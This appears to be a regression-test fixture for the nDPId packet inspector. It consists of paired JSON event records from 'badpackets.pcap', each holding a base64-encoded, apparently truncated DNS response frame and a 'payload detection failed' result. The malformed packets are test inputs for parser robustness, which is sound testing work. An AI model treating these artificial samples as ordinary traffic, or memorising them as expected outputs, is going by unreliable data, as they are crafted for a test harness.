01883{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":42,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1191,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW20gADURSGuMrBHtzLpQ5QA1MvoKTXoKXkiEEAABAAIABAANCmNvLW9wcy1ub3MBbARub2FhA2dvdgAAAQABwAwAAQABAAAAHgAEjFpO18AMAC4AAQAAAB4BHgABBQQAAAAeWSvzilkiuQrWCwFsBG5vYWEDZ292AEw02D+blunLpNdEFin1+qF0AsFQBP\/P93\/ArPYSgPaECAOIBBNrIQ+EUDGS\/sThqanuNHzZj1SVWA9CAzO98GFijUnpdSifTO4x9Qo3CG05zf3N\/s5fFZr1besYCBH9wyyidJjde0HfykraB9D+hG63vApNYAPtCvzquBjiCZq6MQB9mYwB30A9ZMk5CnTRaghcrAc+u1y4AVxKQ0y7ITcqyzwRmRPaDFzxHD6jH9BaBXDnRncsq\/RCjaVuVUM5zOySd85R0L1mEfj+F454c85g1Fzcbn5qsZOXLTMLqQ3FRWJkzSALdhO0DVc9mEVu5bmPyDDblEDXH\/N5epppDPHAVQACAAEAAVGAAAgFbnMtbnfAV8BVAAIAAQABUYAABwRucy1lwFfAVQACAAEAAVGAAAgFbnMtbXfAV8BVAC4AAQABUYABHgACBQMAAVGAWSvzilkiuQrWCwFsBG5vYWEDZ292AKWxpXpNJk\/yTBJP4lU5VttQSdOCPsApD58HTwd7AUzusozvULgo9tJJihlFAQhFSC\/z2qSmGIRA+D\/AEYhYbnkCSlby\/TZn6728QBrsfm\/eTvuVlRcio8ZoKvDceEQjlZ0XdE9\/8FAzxpv4JxMfu37r6Pqo\/kHGUh0O9dYKY5KQ4vRASr9A6ColBpM0Fp6jzxLZgQIgxecmhXKunw6oYe4uAJwPmAwuOtGafuBkrw3+iyL1IFpTT+ieoMjqzlQIJ34apHrtLI7Qpy3V3rCfrvrhFsQK3Blu25MTCVuij\/hrkBYBvavbW5oV1htZ0xgzg+x\/o5Nhl8E5Ss8ok5D\/IczBgQABAAEAAVGAAASMWiHtwYEAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8GUAAEAAQABUYAABIysEe3BlAAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wW0AAQABAAFRgAAEoTcgAsFtABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBgQAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GBAC4AAQABUYAB"} 01869{"packet_event_id":1,"packet_event_name":"packet","packet_id":42,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1191,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW20gADURSGuMrBHtzLpQ5QA1MvoKTXoKXkiEEAABAAIABAANCmNvLW9wcy1ub3MBbARub2FhA2dvdgAAAQABwAwAAQABAAAAHgAEjFpO18AMAC4AAQAAAB4BHgABBQQAAAAeWSvzilkiuQrWCwFsBG5vYWEDZ292AEw02D+blunLpNdEFin1+qF0AsFQBP\/P93\/ArPYSgPaECAOIBBNrIQ+EUDGS\/sThqanuNHzZj1SVWA9CAzO98GFijUnpdSifTO4x9Qo3CG05zf3N\/s5fFZr1besYCBH9wyyidJjde0HfykraB9D+hG63vApNYAPtCvzquBjiCZq6MQB9mYwB30A9ZMk5CnTRaghcrAc+u1y4AVxKQ0y7ITcqyzwRmRPaDFzxHD6jH9BaBXDnRncsq\/RCjaVuVUM5zOySd85R0L1mEfj+F454c85g1Fzcbn5qsZOXLTMLqQ3FRWJkzSALdhO0DVc9mEVu5bmPyDDblEDXH\/N5epppDPHAVQACAAEAAVGAAAgFbnMtbnfAV8BVAAIAAQABUYAABwRucy1lwFfAVQACAAEAAVGAAAgFbnMtbXfAV8BVAC4AAQABUYABHgACBQMAAVGAWSvzilkiuQrWCwFsBG5vYWEDZ292AKWxpXpNJk\/yTBJP4lU5VttQSdOCPsApD58HTwd7AUzusozvULgo9tJJihlFAQhFSC\/z2qSmGIRA+D\/AEYhYbnkCSlby\/TZn6728QBrsfm\/eTvuVlRcio8ZoKvDceEQjlZ0XdE9\/8FAzxpv4JxMfu37r6Pqo\/kHGUh0O9dYKY5KQ4vRASr9A6ColBpM0Fp6jzxLZgQIgxecmhXKunw6oYe4uAJwPmAwuOtGafuBkrw3+iyL1IFpTT+ieoMjqzlQIJ34apHrtLI7Qpy3V3rCfrvrhFsQK3Blu25MTCVuij\/hrkBYBvavbW5oV1htZ0xgzg+x\/o5Nhl8E5Ss8ok5D\/IczBgQABAAEAAVGAAASMWiHtwYEAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8GUAAEAAQABUYAABIysEe3BlAAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3wW0AAQABAAFRgAAEoTcgAsFtABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBgQAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8GBAC4AAQABUYAB"}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":42,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1157,"global_ts_msec":1495451455633} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":42,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1157,"global_ts_msec":1495451455633}
00637{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":43,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":268,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcLicgAPMRVGeA54D7zLpQ5QA1cboMeow9trSEEAABAAIABgAVBmdzbGIwMgNubG0DbmloA2dvdgAAHAABwAwAHAABAAAOEAAQJgfyIAQfFAUAAAAAAAAAA8AMAC4AAQAADhAAnwAcBwQAAA4QWT\/Mx1kYPpsoHANubG0DbmloA2dvdgA8qDsghhg3NnlrIvnzqjoi2t8F9ueZTTrSfT36cTwMHvoAfuu6t8YRYeVd3+cOzU8zRktKFuhy8uB4+IQMr8Ww4Pznbu1iFnscMdfQImu1yTjxzcTFcCU7ST4qi8TAkxt4FjZaNJAfAflP93iMa9IgaD+Y6GcxRg=="} 00623{"packet_event_id":1,"packet_event_name":"packet","packet_id":43,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":268,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcLicgAPMRVGeA54D7zLpQ5QA1cboMeow9trSEEAABAAIABgAVBmdzbGIwMgNubG0DbmloA2dvdgAAHAABwAwAHAABAAAOEAAQJgfyIAQfFAUAAAAAAAAAA8AMAC4AAQAADhAAnwAcBwQAAA4QWT\/Mx1kYPpsoHANubG0DbmloA2dvdgA8qDsghhg3NnlrIvnzqjoi2t8F9ueZTTrSfT36cTwMHvoAfuu6t8YRYeVd3+cOzU8zRktKFuhy8uB4+IQMr8Ww4Pznbu1iFnscMdfQImu1yTjxzcTFcCU7ST4qi8TAkxt4FjZaNJAfAflP93iMa9IgaD+Y6GcxRg=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":43,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":234,"global_ts_msec":1495451467899} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":43,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":234,"global_ts_msec":1495451467899}
01464{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":44,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":881,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":881,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcaRtgAPMRqz3AUm\/FzLpQ5QA1j7gJF4rJ+8eEEAABAAEAAwATA3d3dwZ2ZXRtZWQHdWNkYXZpcwNlZHUAAAEAAcAMAAEAAQAAcIAABKntbQvAEAACAAEAAHCAAAoHZG5zLXR3b8AXwBAAAgABAABwgAAKB2Rucy1vbmXAF8AQAAIAAQAAcIAADAlkbnMtdGhyZWXAF8BaAAEAAQAAOEAABIB4\/AnAWgAcAAEAADhAABAmB\/gQA\/AAAQAAAAAAAAABwHAAAQABAAA4QAAEwFJvxcBwABwAAQAAOEAAECYH+BAD8AADAAAAAAAAAAPARAABAAEAADhAAASAePwKwEQAHAABAAA4QAAQJgf4EAPwAAIAAAAAAAAAAsBaAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5UKvAd1Y2RhdmlzA2VkdQBgF1svDW8JHo\/wOWjspf2N0RNsbS6uvhUBxwA1KawlxeLdYB8S\/ocCl3N3ydK+qLDhjdhLtD+y1QSyja9HnvA54C1qS+Lx80TVJqHkovkt5MfwSVzvMBB5t04PnvWANS1PFZYcsrJm5+kOLUE3vmD+lmjD0I6VOosJcibl9MbFksBaAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5Wtvgd1Y2RhdmlzA2VkdQCYpaPXPGLYHCsxPzngvxXQKvBhCD0A6imizrPpMhGtXepeyR9Bf1Hq+y94HWm5M11uIqfwyAqaIyqKs8Qi6HbUYBY06DPk9fSI4Jwmw8Ie7Sv5COEyuPyA0LUsNeOGgVsrsuoTICsUxBAEI0LIU+Gy7f\/+GxOZF6USDZ71RzrXhcBaAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjwKvAd1Y2RhdmlzA2VkdQCAqNZBwMbzrMNkWZgH5Y0jgozm70jz7wlfuu\/EL\/mHQiFwdlsNK2doaPPqBOsfGm9gLXtCx5VeApk7UI9i\/jxHFrXqCpXnFbTD8mocsaTvCXobB8UPlnpxRae3uC1K3rMjuf5tobIXmI1J0b0pui+eV4qbOnmtYgtJ5dMhNi7KZcBaAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjytvgd1Y2RhdmlzA2VkdQAgvphHwDdhho6Wd\/l05X2KAiP95GF5Y1\/Jt5Q="} 01450{"packet_event_id":1,"packet_event_name":"packet","packet_id":44,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":881,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":881,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcaRtgAPMRqz3AUm\/FzLpQ5QA1j7gJF4rJ+8eEEAABAAEAAwATA3d3dwZ2ZXRtZWQHdWNkYXZpcwNlZHUAAAEAAcAMAAEAAQAAcIAABKntbQvAEAACAAEAAHCAAAoHZG5zLXR3b8AXwBAAAgABAABwgAAKB2Rucy1vbmXAF8AQAAIAAQAAcIAADAlkbnMtdGhyZWXAF8BaAAEAAQAAOEAABIB4\/AnAWgAcAAEAADhAABAmB\/gQA\/AAAQAAAAAAAAABwHAAAQABAAA4QAAEwFJvxcBwABwAAQAAOEAAECYH+BAD8AADAAAAAAAAAAPARAABAAEAADhAAASAePwKwEQAHAABAAA4QAAQJgf4EAPwAAIAAAAAAAAAAsBaAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5UKvAd1Y2RhdmlzA2VkdQBgF1svDW8JHo\/wOWjspf2N0RNsbS6uvhUBxwA1KawlxeLdYB8S\/ocCl3N3ydK+qLDhjdhLtD+y1QSyja9HnvA54C1qS+Lx80TVJqHkovkt5MfwSVzvMBB5t04PnvWANS1PFZYcsrJm5+kOLUE3vmD+lmjD0I6VOosJcibl9MbFksBaAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5Wtvgd1Y2RhdmlzA2VkdQCYpaPXPGLYHCsxPzngvxXQKvBhCD0A6imizrPpMhGtXepeyR9Bf1Hq+y94HWm5M11uIqfwyAqaIyqKs8Qi6HbUYBY06DPk9fSI4Jwmw8Ie7Sv5COEyuPyA0LUsNeOGgVsrsuoTICsUxBAEI0LIU+Gy7f\/+GxOZF6USDZ71RzrXhcBaAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjwKvAd1Y2RhdmlzA2VkdQCAqNZBwMbzrMNkWZgH5Y0jgozm70jz7wlfuu\/EL\/mHQiFwdlsNK2doaPPqBOsfGm9gLXtCx5VeApk7UI9i\/jxHFrXqCpXnFbTD8mocsaTvCXobB8UPlnpxRae3uC1K3rMjuf5tobIXmI1J0b0pui+eV4qbOnmtYgtJ5dMhNi7KZcBaAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjytvgd1Y2RhdmlzA2VkdQAgvphHwDdhho6Wd\/l05X2KAiP95GF5Y1\/Jt5Q="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":44,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":847,"global_ts_msec":1495451472365} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":44,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":847,"global_ts_msec":1495451472365}
01464{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":45,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":881,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":881,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcPAtgAPURieKAePwKzLpQ5QA1NjQJFwxygzCEEAABAAEAAwATA3d3dwZ2ZXRtZWQHdWNkYXZpcwNlZHUAAAEAAcAMAAEAAQAAcIAABKntbQvAEAACAAEAAHCAAAoHZG5zLW9uZcAXwBAAAgABAABwgAAMCWRucy10aHJlZcAXwBAAAgABAABwgAAKB2Rucy10d2\/AF8BEAAEAAQAAOEAABIB4\/AnARAAcAAEAADhAABAmB\/gQA\/AAAQAAAAAAAAABwFoAAQABAAA4QAAEwFJvxcBaABwAAQAAOEAAECYH+BAD8AADAAAAAAAAAAPAcgABAAEAADhAAASAePwKwHIAHAABAAA4QAAQJgf4EAPwAAIAAAAAAAAAAsBEAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5UKvAd1Y2RhdmlzA2VkdQBgF1svDW8JHo\/wOWjspf2N0RNsbS6uvhUBxwA1KawlxeLdYB8S\/ocCl3N3ydK+qLDhjdhLtD+y1QSyja9HnvA54C1qS+Lx80TVJqHkovkt5MfwSVzvMBB5t04PnvWANS1PFZYcsrJm5+kOLUE3vmD+lmjD0I6VOosJcibl9MbFksBEAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5Wtvgd1Y2RhdmlzA2VkdQCYpaPXPGLYHCsxPzngvxXQKvBhCD0A6imizrPpMhGtXepeyR9Bf1Hq+y94HWm5M11uIqfwyAqaIyqKs8Qi6HbUYBY06DPk9fSI4Jwmw8Ie7Sv5COEyuPyA0LUsNeOGgVsrsuoTICsUxBAEI0LIU+Gy7f\/+GxOZF6USDZ71RzrXhcBEAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjwKvAd1Y2RhdmlzA2VkdQCAqNZBwMbzrMNkWZgH5Y0jgozm70jz7wlfuu\/EL\/mHQiFwdlsNK2doaPPqBOsfGm9gLXtCx5VeApk7UI9i\/jxHFrXqCpXnFbTD8mocsaTvCXobB8UPlnpxRae3uC1K3rMjuf5tobIXmI1J0b0pui+eV4qbOnmtYgtJ5dMhNi7KZcBEAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjytvgd1Y2RhdmlzA2VkdQAgvphHwDdhho6Wd\/l05X2KAiP95GF5Y1\/Jt5Q="} 01450{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":881,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":881,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcPAtgAPURieKAePwKzLpQ5QA1NjQJFwxygzCEEAABAAEAAwATA3d3dwZ2ZXRtZWQHdWNkYXZpcwNlZHUAAAEAAcAMAAEAAQAAcIAABKntbQvAEAACAAEAAHCAAAoHZG5zLW9uZcAXwBAAAgABAABwgAAMCWRucy10aHJlZcAXwBAAAgABAABwgAAKB2Rucy10d2\/AF8BEAAEAAQAAOEAABIB4\/AnARAAcAAEAADhAABAmB\/gQA\/AAAQAAAAAAAAABwFoAAQABAAA4QAAEwFJvxcBaABwAAQAAOEAAECYH+BAD8AADAAAAAAAAAAPAcgABAAEAADhAAASAePwKwHIAHAABAAA4QAAQJgf4EAPwAAIAAAAAAAAAAsBEAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5UKvAd1Y2RhdmlzA2VkdQBgF1svDW8JHo\/wOWjspf2N0RNsbS6uvhUBxwA1KawlxeLdYB8S\/ocCl3N3ydK+qLDhjdhLtD+y1QSyja9HnvA54C1qS+Lx80TVJqHkovkt5MfwSVzvMBB5t04PnvWANS1PFZYcsrJm5+kOLUE3vmD+lmjD0I6VOosJcibl9MbFksBEAC4AAQAAOEAAnwABCAMAADhAWsOuUljib5Wtvgd1Y2RhdmlzA2VkdQCYpaPXPGLYHCsxPzngvxXQKvBhCD0A6imizrPpMhGtXepeyR9Bf1Hq+y94HWm5M11uIqfwyAqaIyqKs8Qi6HbUYBY06DPk9fSI4Jwmw8Ie7Sv5COEyuPyA0LUsNeOGgVsrsuoTICsUxBAEI0LIU+Gy7f\/+GxOZF6USDZ71RzrXhcBEAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjwKvAd1Y2RhdmlzA2VkdQCAqNZBwMbzrMNkWZgH5Y0jgozm70jz7wlfuu\/EL\/mHQiFwdlsNK2doaPPqBOsfGm9gLXtCx5VeApk7UI9i\/jxHFrXqCpXnFbTD8mocsaTvCXobB8UPlnpxRae3uC1K3rMjuf5tobIXmI1J0b0pui+eV4qbOnmtYgtJ5dMhNi7KZcBEAC4AAQAAOEAAnwAcCAMAADhAWsOToVjiVjytvgd1Y2RhdmlzA2VkdQAgvphHwDdhho6Wd\/l05X2KAiP95GF5Y1\/Jt5Q="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":45,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":847,"global_ts_msec":1495451472447} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":45,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":847,"global_ts_msec":1495451472447}
00683{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":46,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":298,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":298,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcNasgADkRNoKili+uzLpQ5QA13pAG0FwHT9+EAAABAAYABgABCm15cmlhZC14Y3IDeGNyB2NvbWNhc3QDbmV0AAAwAAHADAAwAAEAAAA8AIgBAAMFAwEAAbCEE7E\/tK2nbtUQfpCepzR9frAaFkveZPoT70D7sMwOQ\/+xk54PDTVfx31QpdhWXZxF\/qABasrJ\/6LYfaZOmcQd4SE2DinBGMT4mCTb3tu0MWKWTlWYTQ08jmf+Gj4hy3cOj1CHK0wnSFV850\/91\/y71SWIEMLStLnWPdodVRCzwAwAMAABAAAAPAEIAQEDBQMBAAHEJufWP+5+U3MEy5wDHiagptJ60KZhTslmbiAZzWh\/R9+Ert+MpcHrkSaQsQ=="} 00669{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":298,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":298,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcNasgADkRNoKili+uzLpQ5QA13pAG0FwHT9+EAAABAAYABgABCm15cmlhZC14Y3IDeGNyB2NvbWNhc3QDbmV0AAAwAAHADAAwAAEAAAA8AIgBAAMFAwEAAbCEE7E\/tK2nbtUQfpCepzR9frAaFkveZPoT70D7sMwOQ\/+xk54PDTVfx31QpdhWXZxF\/qABasrJ\/6LYfaZOmcQd4SE2DinBGMT4mCTb3tu0MWKWTlWYTQ08jmf+Gj4hy3cOj1CHK0wnSFV850\/91\/y71SWIEMLStLnWPdodVRCzwAwAMAABAAAAPAEIAQEDBQMBAAHEJufWP+5+U3MEy5wDHiagptJ60KZhTslmbiAZzWh\/R9+Ert+MpcHrkSaQsQ=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":46,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":264,"global_ts_msec":1495451502567} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":46,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":264,"global_ts_msec":1495451502567}
01431{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":47,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":858,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcgwIgAO4RHAeGQ2QkzLpQ5QA1kV0JAMGOMPmEIAABAAgAAAABA2xiZANlcGEDZ292AAAwAAHADAAwAAEAAVGAAQgBAAMKAwEAAeFeeMF81JKKXyZ7m1fNWItdfwnHSJNneiWKkU4z2Dds6bAcMAU825F5fa9NfMMZJ1ofvKubnNMwvEGV7LA8h9brhYvQ10pMxj96kJZe+D2O7Ie\/U1L+VkQZ1frUDUuaBBXlpisapE85PJvpkCTjRzTK5qfC1E6SFDqWtZU3beWTOHPdeWuk+L65g0ywzAgTHi3bTkvxCU0YMUSrmM\/ucRJhZSp2Bnnu9e5m0wWVcQN8RCwwKM4581XZ86AZEsMcNMn4lgfGbO+ePZEUKN4jO3xsvTDL8VCk4S6VztoVAr8CEESKK9QNE1uUtDhbA9peZVictCS6cvQdOaTSDVAe2XvADAAwAAEAAVGAAQgBAAMKAwEAAd4Ik\/y5u\/4IGOhG4VVn7buHGb4ZWWngeCtt0OswAlaKe7FLhQgiGIJppBUZzlluNA5O2z8uFn\/6vWcjc1APkIM8gTsexgXG323L+zrIDzJcesj+XxBGl3maMZApgnsAZwFPAXNwNwEd01ugaQCevUjlvvpmQcMCgMv\/o5tuAiZQn6osfIl+95UJAH0ZoIKJkmeWYoGfMFLJeDZVa92beqMioYSqa5qhiSFtNLMmVkEyO4srbnaIMRv2nTboTEx5uIQZAKEhoQiXCLMvnBvEdR4Bmlz2s25A5KJRfNyhRIPY5lTpaPW6s2MAdi6wQOi\/tq2vQucnMXojmyYDizNjnxHADAAwAAEAAVGAAQgBAQMKAwEAAcIMnmfbk6YNzYUpG7ynL2OsKhTqhlCotZUrmruLmEWBoYibBwJ4CPXSrMDYIOj2\/UHdAWHfr3HEPagX8To21t8Hq8NRY8e+GloeYTuhJFOva2ivoXj\/E4V0VfeJJVuHTY0LKwyYoTcgGJU9hLfK7JOaOq3a80oNHJ9v5iaJ8Vvi5adW1QquXLQWZtNjVOho8xmeZ\/bqiUmkgaDPOoSlyAdf9GkOJkfVzTpRgahyLRTLJYP1dcShPIBW\/gBn0naElasEgYAZ62erTyMj+Dj+McLObt+enoOo"} 01417{"packet_event_id":1,"packet_event_name":"packet","packet_id":47,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":858,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcgwIgAO4RHAeGQ2QkzLpQ5QA1kV0JAMGOMPmEIAABAAgAAAABA2xiZANlcGEDZ292AAAwAAHADAAwAAEAAVGAAQgBAAMKAwEAAeFeeMF81JKKXyZ7m1fNWItdfwnHSJNneiWKkU4z2Dds6bAcMAU825F5fa9NfMMZJ1ofvKubnNMwvEGV7LA8h9brhYvQ10pMxj96kJZe+D2O7Ie\/U1L+VkQZ1frUDUuaBBXlpisapE85PJvpkCTjRzTK5qfC1E6SFDqWtZU3beWTOHPdeWuk+L65g0ywzAgTHi3bTkvxCU0YMUSrmM\/ucRJhZSp2Bnnu9e5m0wWVcQN8RCwwKM4581XZ86AZEsMcNMn4lgfGbO+ePZEUKN4jO3xsvTDL8VCk4S6VztoVAr8CEESKK9QNE1uUtDhbA9peZVictCS6cvQdOaTSDVAe2XvADAAwAAEAAVGAAQgBAAMKAwEAAd4Ik\/y5u\/4IGOhG4VVn7buHGb4ZWWngeCtt0OswAlaKe7FLhQgiGIJppBUZzlluNA5O2z8uFn\/6vWcjc1APkIM8gTsexgXG323L+zrIDzJcesj+XxBGl3maMZApgnsAZwFPAXNwNwEd01ugaQCevUjlvvpmQcMCgMv\/o5tuAiZQn6osfIl+95UJAH0ZoIKJkmeWYoGfMFLJeDZVa92beqMioYSqa5qhiSFtNLMmVkEyO4srbnaIMRv2nTboTEx5uIQZAKEhoQiXCLMvnBvEdR4Bmlz2s25A5KJRfNyhRIPY5lTpaPW6s2MAdi6wQOi\/tq2vQucnMXojmyYDizNjnxHADAAwAAEAAVGAAQgBAQMKAwEAAcIMnmfbk6YNzYUpG7ynL2OsKhTqhlCotZUrmruLmEWBoYibBwJ4CPXSrMDYIOj2\/UHdAWHfr3HEPagX8To21t8Hq8NRY8e+GloeYTuhJFOva2ivoXj\/E4V0VfeJJVuHTY0LKwyYoTcgGJU9hLfK7JOaOq3a80oNHJ9v5iaJ8Vvi5adW1QquXLQWZtNjVOho8xmeZ\/bqiUmkgaDPOoSlyAdf9GkOJkfVzTpRgahyLRTLJYP1dcShPIBW\/gBn0naElasEgYAZ62erTyMj+Dj+McLObt+enoOo"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":47,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":824,"global_ts_msec":1495451558382} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":47,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":824,"global_ts_msec":1495451558382}
00656{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":48,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":282,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcvxEgADcRsUa4rRdszLpQ5QA1oygGwFz7eMKEEAABAAQAAAABDWp1ZGljaWFsd2F0Y2gDb3JnAAAwAAHADAAwAAEAAA4QAQgBAAMHAwEAAdl6vxiL++F\/pjIKqj9e7RaBV5rwA3o9DNcv0h4HQ93WZJ+2YrrhIVTBghHPFs+8FEN7Xdx2djyC1pjSprgXQ2HeWbJZy1rO2CCoH12hxAbUEQnPy1BYYsMpATL7FFzDIup6CYAV7Is7xTwPl\/Wm5B0cxltQlAHAlLMQiylRrZup5SRgZQGoi1q7dsIP6kgvfOSmZGIwr5OxtBC\/RzC+7OcNnmbexBAx\/ujQjwn1ITH0JeAIU+9jiKC+"} 